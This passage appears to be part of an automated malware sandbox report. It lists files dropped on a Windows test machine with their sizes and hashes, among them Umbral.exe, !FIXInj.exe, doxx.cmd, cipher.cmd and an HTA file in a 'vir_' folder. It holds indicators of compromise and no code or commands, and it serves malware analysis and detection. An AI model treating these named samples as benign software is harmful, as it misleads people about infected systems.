                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe589aa5.TMP

                                                                                                                                                                          Filesize

                                                                                                                                                                          202B

                                                                                                                                                                          MD5

                                                                                                                                                                          13975681c56f2d4a8101339d32a10877

                                                                                                                                                                          SHA1

                                                                                                                                                                          e3cc44c9e6c4cab7d5602f40a8a1f867dce64dfa

                                                                                                                                                                          SHA256

                                                                                                                                                                          57065b51c4f2490bfc281dbec16d88492a4fed47a1c448a94da60f0e288978dd

                                                                                                                                                                          SHA512

                                                                                                                                                                          2d844ffa590fa3e174f4dc2172ed3413172f85553eb9aed38a31ec30d55290ad67f64c7c3c8d3262b4c63983cd5ef588b2ed6f874f5f498a2a84c78d9b10e4a5

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                          Filesize

                                                                                                                                                                          16B

                                                                                                                                                                          MD5

                                                                                                                                                                          6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                                          SHA1

                                                                                                                                                                          58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                                          SHA256

                                                                                                                                                                          0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                                          SHA512

                                                                                                                                                                          9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                          Filesize

                                                                                                                                                                          8KB

                                                                                                                                                                          MD5

                                                                                                                                                                          61c11d4251384677fad386514b21d95d

                                                                                                                                                                          SHA1

                                                                                                                                                                          1c7b0290e3bccb6cea4135eeb6b0127673e0afa4

                                                                                                                                                                          SHA256

                                                                                                                                                                          90c4b7fc561ddb17297888c76c5d4a208c2cb9aa8208773f09f4305bf3890b5c

                                                                                                                                                                          SHA512

                                                                                                                                                                          61369ebe7130d4cae22960a695ad6551aeb568556da45ee90057bd89dc10f1956be8165fbe6d16a017e2b13f1642e3b20d94de4d1060d40816ecf621618f914d

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                          Filesize

                                                                                                                                                                          10KB

                                                                                                                                                                          MD5

                                                                                                                                                                          4341416b3c15665e455f2c67572d3eb3

                                                                                                                                                                          SHA1

                                                                                                                                                                          79938abd5074e28b10469592df918554da009d48

                                                                                                                                                                          SHA256

                                                                                                                                                                          1e3bbb9f33f8d07bae76ad25bdf3d369744c9bb958c744ec7f3b939da798b262

                                                                                                                                                                          SHA512

                                                                                                                                                                          f4503cca490fbd8ecc69d015be3450880d50fc36db4f105c74b81d940eff5277e230b65fdec963e56917cb5a9c8cb9aad9ef6560a132554073aa06b9fcb1097f

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                          Filesize

                                                                                                                                                                          10KB

                                                                                                                                                                          MD5

                                                                                                                                                                          239383e54e51ae0a2ec1961143afea09

                                                                                                                                                                          SHA1

                                                                                                                                                                          f4143c8c006e11ac2d50819ed1b478060567d096

                                                                                                                                                                          SHA256

                                                                                                                                                                          c8943823ecd9d2fdd024d69d671dee44f44a2de678d3a2d15499b0879f14ea74

                                                                                                                                                                          SHA512

                                                                                                                                                                          ba8120495c209c6e2e39f0cbfab59b46e5c458f252625157112c02736c2f89005c0e629cf67a65a6e5956dbf73e2cfbdb11dffc6eadeb136a364cb2ca5cec6d8

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                          Filesize

                                                                                                                                                                          11KB

                                                                                                                                                                          MD5

                                                                                                                                                                          666cce0ce13c54cf1c06974ce268b0ab

                                                                                                                                                                          SHA1

                                                                                                                                                                          30a6272af9c1ee856f8a4fc4a945e15ff749991d

                                                                                                                                                                          SHA256

                                                                                                                                                                          7c1d45ec83699737b00b0f68714e1eb87c1878f7416ec553b5641895e1bf7791

                                                                                                                                                                          SHA512

                                                                                                                                                                          71d41ac3bfea79b550db4943b44f7787cdd0a71498fe8778df25a097e0fc4d79842ed2cb15d35505291604d60c9c84b9c3c026104d0e44197e49377680dfb394

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                          Filesize

                                                                                                                                                                          10KB

                                                                                                                                                                          MD5

                                                                                                                                                                          e25dcc5bf5ba8f42e2db32e8ba1c69a3

                                                                                                                                                                          SHA1

                                                                                                                                                                          9fef5ea7ae4c3a91ca91c1fd90c7db02a6879ef8

                                                                                                                                                                          SHA256

                                                                                                                                                                          d9d83d50f4a2147da507517e8506d965e47b7386147c0e8042a7be594180089e

                                                                                                                                                                          SHA512

                                                                                                                                                                          b46814908484cf779e368379f5e89c51083f54e2c7fa127d6459daa30d925c1036440a415db62fc6df0c0c8465ed6fb79b623f3d556f6b84bac7090a9ec995c1

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          37KB

                                                                                                                                                                          MD5

                                                                                                                                                                          ad8378c96a922dcfe813935d1eec9ae4

                                                                                                                                                                          SHA1

                                                                                                                                                                          0e7ee31880298190258f5282f6cc2797fccdc134

                                                                                                                                                                          SHA256

                                                                                                                                                                          9a7b8171f8c6bd4bb61b7d8baf7dab921983ab7767705c3f1e1265704599ab98

                                                                                                                                                                          SHA512

                                                                                                                                                                          d38a7581ef5c3dcc8752fc2465ad698605bbd38bf380201623265e5ef121510d3f34116438727e60b3832e867e2ed4fd52081d58690690ff98b28cde80f6af5f

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\928aa84e-2505-4f7a-a318-a83ea2e7e9b8\ProgressBarSplash.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          87KB

                                                                                                                                                                          MD5

                                                                                                                                                                          ed001288c24f331c9733acf3ca3520b0

                                                                                                                                                                          SHA1

                                                                                                                                                                          1e935afba79825470c54afaec238402d068ddefa

                                                                                                                                                                          SHA256

                                                                                                                                                                          6c20ba0c24e2cf169fd9b0623e4a1abe3718824ff48085250dae8c019cc6cb06

                                                                                                                                                                          SHA512

                                                                                                                                                                          e6ba29aa9a8c61e8fd2823cf96343fa7c3c41e8f698a6be428b13923ed3f103ea7a7d613b8808a6447f37e54516b49f61976391a551ec4fa184cc7abe38b2444

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          12KB

                                                                                                                                                                          MD5

                                                                                                                                                                          06f13f50c4580846567a644eb03a11f2

                                                                                                                                                                          SHA1

                                                                                                                                                                          39ee712b6dfc5a29a9c641d92c7467a2c4445984

                                                                                                                                                                          SHA256

                                                                                                                                                                          0636e8f9816b17d7cff26ef5d280ce1c1aae992cda8165c6f4574029258a08a9

                                                                                                                                                                          SHA512

                                                                                                                                                                          f5166a295bb0960e59c176eefa89c341563fdf0eec23a45576e0ee5bf7e8271cc35eb9dd56b11d9c0bbe789f2eac112643108c46be3341fa332cfcf39b4a90b9

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Umbral.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          230KB

                                                                                                                                                                          MD5

                                                                                                                                                                          9694195bfd2d5a2d219c548d8dc65cf0

                                                                                                                                                                          SHA1

                                                                                                                                                                          d1113d97bb1114025e9260e898f3a3048a5a6fda

                                                                                                                                                                          SHA256

                                                                                                                                                                          c58b3fa42e404b4a095ee2959a7975b392d7d6b6af6e4d11c1431e3a430dfb6e

                                                                                                                                                                          SHA512

                                                                                                                                                                          24bb0f6432b221fe621d81a1c730bd473e9c295aa66a2b50cbe670ad2260f942a915f7f9aef65e6dc28320b8208fc712d9bfdc43dbc1a607ed9393bb5c17051a

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zi5vxeef.ad2.ps1

                                                                                                                                                                          Filesize

                                                                                                                                                                          60B

                                                                                                                                                                          MD5

                                                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                          SHA1

                                                                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                          SHA256

                                                                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                          SHA512

                                                                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\nsc7D2B.tmp\modern-wizard.bmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          25KB

                                                                                                                                                                          MD5

                                                                                                                                                                          cbe40fd2b1ec96daedc65da172d90022

                                                                                                                                                                          SHA1

                                                                                                                                                                          366c216220aa4329dff6c485fd0e9b0f4f0a7944

                                                                                                                                                                          SHA256

                                                                                                                                                                          3ad2dc318056d0a2024af1804ea741146cfc18cc404649a44610cbf8b2056cf2

                                                                                                                                                                          SHA512

                                                                                                                                                                          62990cb16e37b6b4eff6ab03571c3a82dcaa21a1d393c3cb01d81f62287777fb0b4b27f8852b5fa71bc975feab5baa486d33f2c58660210e115de7e2bd34ea63

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\nsc7D2B.tmp\nsDialogs.dll

                                                                                                                                                                          Filesize

                                                                                                                                                                          9KB

                                                                                                                                                                          MD5

                                                                                                                                                                          12465ce89d3853918ed3476d70223226

                                                                                                                                                                          SHA1

                                                                                                                                                                          4c9f4b8b77a254c2aeace08c78c1cffbb791640d

                                                                                                                                                                          SHA256

                                                                                                                                                                          5157fe688cca27d348171bd5a8b117de348c0844ca5cb82bc68cbd7d873a3fdc

                                                                                                                                                                          SHA512

                                                                                                                                                                          20495270bcd0cae3102ffae0a3e783fad5f0218a5e844c767b07a10d2cfab2fab0afb5e07befa531ba466393a3d6255741f89c6def21ec2887234f49adceea2f

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\nsc7D2B.tmp\nsExec.dll

                                                                                                                                                                          Filesize

                                                                                                                                                                          6KB

                                                                                                                                                                          MD5

                                                                                                                                                                          0a6f707fa22c3f3e5d1abb54b0894ad6

                                                                                                                                                                          SHA1

                                                                                                                                                                          610cb2c3623199d0d7461fc775297e23cef88c4e

                                                                                                                                                                          SHA256

                                                                                                                                                                          370e47364561fa501b1300b056fb53fae12b1639fdf5f113275bee03546081c0

                                                                                                                                                                          SHA512

                                                                                                                                                                          af0c8ca0c892f1b757fbd700061f3d81417dff11d89bdff45e977de81ad51c97862406cf7e230e76cf99497f93f57bf09609740953cd81b0d795465ac2623ea8

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\!main.cmd

                                                                                                                                                                          Filesize

                                                                                                                                                                          2KB

                                                                                                                                                                          MD5

                                                                                                                                                                          5bef4958caf537ac924b6ce01e1d1e13

                                                                                                                                                                          SHA1

                                                                                                                                                                          cf7a0805a98f3c16ca14c6e420e2ca44ad77a164

                                                                                                                                                                          SHA256

                                                                                                                                                                          e801541a9d48a9adbb720cdb5b06f9bab9b4a62f0434221876a607a7be75d28d

                                                                                                                                                                          SHA512

                                                                                                                                                                          9f62246e56f3461f8d180d3a4bc3ccd6187f457196b770af9c8427a3795504f6b44d2fb7a305d41d54d58e4759136426ca4f6e09771136f27d2c478aad153f99

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\61b13e8da79fd7d9f190f23f96c189db.dll

                                                                                                                                                                          Filesize

                                                                                                                                                                          9KB

                                                                                                                                                                          MD5

                                                                                                                                                                          6ed35e30e6f986f74ef63999ea6a3033

                                                                                                                                                                          SHA1

                                                                                                                                                                          88af7462758ff24635f127b6d7ea6791ee89ab40

                                                                                                                                                                          SHA256

                                                                                                                                                                          b18d9f97d3f8a8f7fa295d9a81f6282630c687c9ba4066f6c40ed86a8502ccb2

                                                                                                                                                                          SHA512

                                                                                                                                                                          bcb0db406af39338e051285aa4dbadd421e7c2bd538714688c9fa52e70c69f38ab30cf97a62b10c4d2f3516e28e15fb63c2e4c455f894d4968dc4a2bb25b0dab

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\Macro_blank.png

                                                                                                                                                                          Filesize

                                                                                                                                                                          392B

                                                                                                                                                                          MD5

                                                                                                                                                                          d388dfd4f8f9b8b31a09b2c44a3e39d7

                                                                                                                                                                          SHA1

                                                                                                                                                                          fb7d36907e200920fe632fb192c546b68f28c03a

                                                                                                                                                                          SHA256

                                                                                                                                                                          a917ddc25d483b737296f945b8b7701a08d4692d0d34417fe1b590caac28359c

                                                                                                                                                                          SHA512

                                                                                                                                                                          2fcff4775a0e93c53b525b44aadefe4532efd790c504d0343626a7322a7c99073ed645eb08bd13b31e752e09c13f07b74e43f0eb1c46be082efc948b34364401

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\Read Me.txt

                                                                                                                                                                          Filesize

                                                                                                                                                                          2KB

                                                                                                                                                                          MD5

                                                                                                                                                                          1f2db4e83bbb8ed7c50b563fdfbe6af4

                                                                                                                                                                          SHA1

                                                                                                                                                                          94da96251e72d27849824b236e1cf772b2ee95fd

                                                                                                                                                                          SHA256

                                                                                                                                                                          44a2236b5c5fe30f599be03643129106852a061bb1546ff28ca82fa0a9c3b00b

                                                                                                                                                                          SHA512

                                                                                                                                                                          f41f0880443cd0bad0d98ed3ef8f4541840cb9de9d4bd0f7e354dc90d16c3077d8bb2559a362e6045e9abd478e4fd6a3333f536a518e3769952479dfff1d0b91

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\Rover.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          5.1MB

                                                                                                                                                                          MD5

                                                                                                                                                                          63d052b547c66ac7678685d9f3308884

                                                                                                                                                                          SHA1

                                                                                                                                                                          a6e42e6a86e3ff9fec137c52b1086ee140a7b242

                                                                                                                                                                          SHA256

                                                                                                                                                                          8634e9241729f16a8c2c23d5c184384815b97026e3d1a2d6dd0ddc825b142aba

                                                                                                                                                                          SHA512

                                                                                                                                                                          565b9243ec14dc1cf6f6ddf4a7158e208937f553367e55cd59f62f1834fcfb7d9fb387b0636dc07520f590dcd55eb5f60f34ea2279dc736f134db7b19e3aa642

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\SolaraBootstraper.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          290KB

                                                                                                                                                                          MD5

                                                                                                                                                                          288a089f6b8fe4c0983259c6daf093eb

                                                                                                                                                                          SHA1

                                                                                                                                                                          8eafbc8e6264167bc73c159bea34b1cfdb30d34f

                                                                                                                                                                          SHA256

                                                                                                                                                                          3536c40290b9e7e9c3c47a96ab10fe3b737f334dd6779eaf70e35e91e10a677b

                                                                                                                                                                          SHA512

                                                                                                                                                                          c04bf3530cd471d589efb8f7e6bdddb39422fc4284afc7f2d3645a646ebbee170d57dc57eff30cee05ef091c64c6a98586c5a887d25fe53e49531c137d285448

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\ac3.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          844KB

                                                                                                                                                                          MD5

                                                                                                                                                                          7ecfc8cd7455dd9998f7dad88f2a8a9d

                                                                                                                                                                          SHA1

                                                                                                                                                                          1751d9389adb1e7187afa4938a3559e58739dce6

                                                                                                                                                                          SHA256

                                                                                                                                                                          2e67d5e7d96aec62a9dda4c0259167a44908af863c2b3af2a019723205abba9e

                                                                                                                                                                          SHA512

                                                                                                                                                                          cb05e82b17c0f7444d1259b661f0c1e6603d8a959da7475f35078a851d528c630366916c17a37db1a2490af66e5346309177c9e31921d09e7e795492868e678d

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\beastify.url

                                                                                                                                                                          Filesize

                                                                                                                                                                          213B

                                                                                                                                                                          MD5

                                                                                                                                                                          94c83d843db13275fab93fe177c42543

                                                                                                                                                                          SHA1

                                                                                                                                                                          4fc300dd7f3c3fb4bdcb1a2f07eea24936d843e5

                                                                                                                                                                          SHA256

                                                                                                                                                                          783a6de56d4538e4e2dfa0c1b4b69bdda1c119a559241807ddfdeece057f7b2e

                                                                                                                                                                          SHA512

                                                                                                                                                                          5259a5b9473e599fd5092d67710cb71caf432e397155fda136ded39bb0c03aa88c68e6e50ca3eba13ec6124c791a4d64c5fed701a46cdc651c2261ac8436b1fe

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\bg.png

                                                                                                                                                                          Filesize

                                                                                                                                                                          300KB

                                                                                                                                                                          MD5

                                                                                                                                                                          6838598368aa834d27e7663c5e81a6fa

                                                                                                                                                                          SHA1

                                                                                                                                                                          d4d2fc625670cb81e4c8e16632df32c218e183ce

                                                                                                                                                                          SHA256

                                                                                                                                                                          0e0e9bf5c3c81b522065e2c3bdc74e5c6e8c422230a1fe41f3bc7bef4f21604e

                                                                                                                                                                          SHA512

                                                                                                                                                                          f60cbad5f20418bb244206ae5754e16deac01f37f6cbbb5d0d7c916f0b0fef7bdeaf436a74056e2a2042e3d8b6c1da4bc976a32f604c7d80a57528583f6c5e47

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\bloatware\1.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          15.6MB

                                                                                                                                                                          MD5

                                                                                                                                                                          d952d907646a522caf6ec5d00d114ce1

                                                                                                                                                                          SHA1

                                                                                                                                                                          75ad9bacb60ded431058a50a220e22a35e3d03f7

                                                                                                                                                                          SHA256

                                                                                                                                                                          f92ad1e92780a039397fd62d04affe97f1a65d04e7a41c9b5da6dd3fd265967e

                                                                                                                                                                          SHA512

                                                                                                                                                                          3bfaee91d161de09c66ef7a85ad402f180624293cdc13d048edbeec5a3c4ad2bc84d5fde92383feb9b9f2d83e40a3e9ff27e81a32e605513611b6001f284b9fe

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\bloatware\2.hta

                                                                                                                                                                          Filesize

                                                                                                                                                                          1KB

                                                                                                                                                                          MD5

                                                                                                                                                                          dda846a4704efc2a03e1f8392e6f1ffc

                                                                                                                                                                          SHA1

                                                                                                                                                                          387171a06eee5a76aaedc3664385bb89703cf6df

                                                                                                                                                                          SHA256

                                                                                                                                                                          e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25

                                                                                                                                                                          SHA512

                                                                                                                                                                          5cc5ad3fbdf083a87a65be76869bca844faa2d9be25657b45ad070531892f20d9337739590dd8995bca03ce23e9cb611129fe2f8457879b6263825d6df49da7a

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\cipher.cmd

                                                                                                                                                                          Filesize

                                                                                                                                                                          174B

                                                                                                                                                                          MD5

                                                                                                                                                                          c2fd32ef78ee860e8102749ae2690e44

                                                                                                                                                                          SHA1

                                                                                                                                                                          6707151d251074738f1dd0d19afc475e3ba28b7e

                                                                                                                                                                          SHA256

                                                                                                                                                                          9f7f2a48b65dc8712e037fdbbdeae00adad6a417750c76cdc3ea80bdd0fa1bc5

                                                                                                                                                                          SHA512

                                                                                                                                                                          395483f9394a447d4a5899680ca9e5b4813ac589a9d3ff25b940adaf13e000b0512895d60039948dc51c44a9954cfadac54fd9bd4294d7252acdec024eebc645

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\doxx.cmd

                                                                                                                                                                          Filesize

                                                                                                                                                                          102B

                                                                                                                                                                          MD5

                                                                                                                                                                          013a01835332a3433255e3f2dd8d37d6

                                                                                                                                                                          SHA1

                                                                                                                                                                          8a318cc4966eee5ebcb2c121eb4453161708f96c

                                                                                                                                                                          SHA256

                                                                                                                                                                          23923556f7794769015fb938687bf21c28ae5f562c4550c41d3d568ad608b99b

                                                                                                                                                                          SHA512

                                                                                                                                                                          12e9d439c8c558218d49415bbd27d0749f9f7a7e6c177074e11ac1a6f2185c22c4cf51f5a41133eaddf8a06288c352460d4450ad9702c4652ad259ed1260f42d

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\ed64c9c085e9276769820a981139e3c2a7950845.dll

                                                                                                                                                                          Filesize

                                                                                                                                                                          22.9MB

                                                                                                                                                                          MD5

                                                                                                                                                                          6eb191703124e29beca826ee2a0f2ed7

                                                                                                                                                                          SHA1

                                                                                                                                                                          a583c2239401a58fab2806029ef381a67c8ea799

                                                                                                                                                                          SHA256

                                                                                                                                                                          db6572b105c16b9bc657e457e13284926f28b40ea0c6736ae485c3cd0690110a

                                                                                                                                                                          SHA512

                                                                                                                                                                          c50fd03d1bf77b44c17d20fa8966d1f31ba7cea478f9fd6e0ffd862bcd039ed1a853138e2493ad7edeffa1ad512c96fdd54f66b25926a5687da580804440b045

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\1\.didata

                                                                                                                                                                          Filesize

                                                                                                                                                                          512B

                                                                                                                                                                          MD5

                                                                                                                                                                          41b8ce23dd243d14beebc71771885c89

                                                                                                                                                                          SHA1

                                                                                                                                                                          051c6d0acda9716869fbc453e27230d2b36d9e8f

                                                                                                                                                                          SHA256

                                                                                                                                                                          bc86365a38e3c8472413f1656a28b04703d8c77cc50c0187ddf9d0afbb1f9bf7

                                                                                                                                                                          SHA512

                                                                                                                                                                          f0fb505c9f8d2699717641c3571acb83d394b0f8eee9cff80ad95060d1993f9f4d269c58eb35aae64a639054e42aaa699719b08357f7c0c057b407e2bdf775da

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\1\.edata

                                                                                                                                                                          Filesize

                                                                                                                                                                          512B

                                                                                                                                                                          MD5

                                                                                                                                                                          37c1a5c63717831863e018c0f51dabb7

                                                                                                                                                                          SHA1

                                                                                                                                                                          8aab4ebcf9c4a3faf3fc872d96709460d6bf6378

                                                                                                                                                                          SHA256

                                                                                                                                                                          d975b12871fc3f217b71bb314e5e9ea6340b66ece9e26a0c9cbd46de22368941

                                                                                                                                                                          SHA512

                                                                                                                                                                          4cf2b8efa3c4520cc80c4d560662bddbe4071b6908d29550d59bcda94c8b80a282b5e0b4536a88331a6a507e8410ccb35f4e38d0b571960f822bda7b69e4bb19

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\1\.idata

                                                                                                                                                                          Filesize

                                                                                                                                                                          4KB

                                                                                                                                                                          MD5

                                                                                                                                                                          a73d686f1e8b9bb06ec767721135e397

                                                                                                                                                                          SHA1

                                                                                                                                                                          42030ea2f06f38d5495913b418e993992e512417

                                                                                                                                                                          SHA256

                                                                                                                                                                          a0936d30641746144eae91e37e8cbed42dc9b3ee3e5fdda8e45ad356180f0461

                                                                                                                                                                          SHA512

                                                                                                                                                                          58942400f6b909e42d36187fd19d64a56b92c2343ed06f6906291195fea6fe5a79fc628cbfc7c64e09f0196cbaba83dc376985ceef305bd0a2fadaca14b5c9e5

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\1\.txt

                                                                                                                                                                          Filesize

                                                                                                                                                                          512B

                                                                                                                                                                          MD5

                                                                                                                                                                          8f2f090acd9622c88a6a852e72f94e96

                                                                                                                                                                          SHA1

                                                                                                                                                                          735078338d2c5f1b3f162ce296611076a9ddcf02

                                                                                                                                                                          SHA256

                                                                                                                                                                          61da25d2beb88b55ef629fab530d506a37b56cfabfa95916c6c5091595d936e4

                                                                                                                                                                          SHA512

                                                                                                                                                                          b98fbb6d503267532d85bf0eb466e4e25169baefafdaaa97bdc44eaab2487419fde106626c0cc935ba59bcb4472597e23b3c21e3347ed32de53c185739735404

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\1\0.txt

                                                                                                                                                                          Filesize

                                                                                                                                                                          1.3MB

                                                                                                                                                                          MD5

                                                                                                                                                                          c1672053cdc6d8bf43ee7ac76b4c5eee

                                                                                                                                                                          SHA1

                                                                                                                                                                          fc1031c30cc72a12c011298db8dc9d03e1d6f75c

                                                                                                                                                                          SHA256

                                                                                                                                                                          1cdb267b3e66becf183e9e747ae904e8684bab519041f39f9bd0b7dd0b3c66cb

                                                                                                                                                                          SHA512

                                                                                                                                                                          12e64a77c5b07d1f0fe1f07a6bf01078373d99bb7372a2d8a5c44fdbf753b44381f112822c1f75475e762d85fcf806487925860941005d342473ec90f9997633

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\1\CERTIFICATE.cer

                                                                                                                                                                          Filesize

                                                                                                                                                                          7KB

                                                                                                                                                                          MD5

                                                                                                                                                                          c07164d3b38ca643290adaa325e1d842

                                                                                                                                                                          SHA1

                                                                                                                                                                          895841abf68668214e5c8aa0a1600ff6b88e299d

                                                                                                                                                                          SHA256

                                                                                                                                                                          da5dd4622c1c9054dc2c01cb36d26802ffbd3345e8cf8a20a2e8d7a859251600

                                                                                                                                                                          SHA512

                                                                                                                                                                          92922192fdca0b6a0a6634415fd0ccdd32087584b7b2ea0a1e550b8bf9a5c8fe79401fadc0de8d4d340ef700a01079b51529adcab576f0ca17a864748ae39118

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\1\_.txt

                                                                                                                                                                          Filesize

                                                                                                                                                                          718KB

                                                                                                                                                                          MD5

                                                                                                                                                                          ad6e46e3a3acdb533eb6a077f6d065af

                                                                                                                                                                          SHA1

                                                                                                                                                                          595ad8ee618b5410e614c2425157fa1a449ec611

                                                                                                                                                                          SHA256

                                                                                                                                                                          b68ad9b352910f95e5496032eea7e00678c3b2f6b0923eb88a6975ef52daf459

                                                                                                                                                                          SHA512

                                                                                                                                                                          65d1f189e905419cc0569fd7f238af4f8ba726a4ddad156345892879627d2297b2a29213ac8440756efb1d7aaead1c0858462c4d039b0327af16cbb95840a1e8

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\1\data.txt

                                                                                                                                                                          Filesize

                                                                                                                                                                          14KB

                                                                                                                                                                          MD5

                                                                                                                                                                          4c195d5591f6d61265df08a3733de3a2

                                                                                                                                                                          SHA1

                                                                                                                                                                          38d782fd98f596f5bf4963b930f946cf7fc96162

                                                                                                                                                                          SHA256

                                                                                                                                                                          94346a0e38b0c2ccd03cf9429d1c1bce2562c29110bb29a9b0befc6923618146

                                                                                                                                                                          SHA512

                                                                                                                                                                          10ee2e62ca1efa1cda51ca380a36dfabdd2e72cec41299369cac95fc3864ca5f4faa959f70d2b2c145430e591b1249f233b31bd78ba9ee64cf0604c887b674d7

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\1\i.txt

                                                                                                                                                                          Filesize

                                                                                                                                                                          6KB

                                                                                                                                                                          MD5

                                                                                                                                                                          d40fc822339d01f2abcc5493ac101c94

                                                                                                                                                                          SHA1

                                                                                                                                                                          83d77b6dc9d041cc5db064da4cae1e287a80b9e6

                                                                                                                                                                          SHA256

                                                                                                                                                                          b28af33bc028474586bb62da7d4991ddd6f898df7719edb7b2dfce3d0ea1d8c6

                                                                                                                                                                          SHA512

                                                                                                                                                                          5701c2a68f989e56e7a38e13910421c8605bc7b58ae9b87c1d15375829e100bad4ac86186f9d5670c9a5e0dd3e46f097d1d276e62d878e0c2f6eb5f6db77dd46

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\2\CODE2000.TTF

                                                                                                                                                                          Filesize

                                                                                                                                                                          3.0MB

                                                                                                                                                                          MD5

                                                                                                                                                                          052eaff1c80993c8f7dca4ff94bb83ca

                                                                                                                                                                          SHA1

                                                                                                                                                                          62a148210e0103b860b7c3257a18500dff86cb83

                                                                                                                                                                          SHA256

                                                                                                                                                                          afabc4e845085d6b4f72a9de672d752c002273b52221a10caf90d8cb03334f3c

                                                                                                                                                                          SHA512

                                                                                                                                                                          57209c40b55170da437ab1120b2f486d698084d7d572b14889b2184e8327010a94eee25a86c9e0156ba12ed1a680507016390f059f265cceb3aa8698e8e94764

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_36fbbcbe-a539-47f9-8bd8-3b3db77447b4\export\2\readme.txt

                                                                                                                                                                          Filesize

                                                                                                                                                                          1KB

                                                                                                                                                                          MD5

